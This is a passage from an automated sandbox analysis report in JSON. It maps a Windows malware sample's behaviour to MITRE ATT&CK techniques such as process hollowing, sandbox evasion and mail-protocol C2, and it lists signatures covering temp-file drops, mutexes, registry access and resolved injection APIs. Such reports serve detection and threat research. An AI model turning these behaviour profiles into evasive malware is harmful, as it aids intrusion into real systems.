Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 4, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\clfkcbws.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75560000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 75120000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00000364)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"clfkcbws.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a 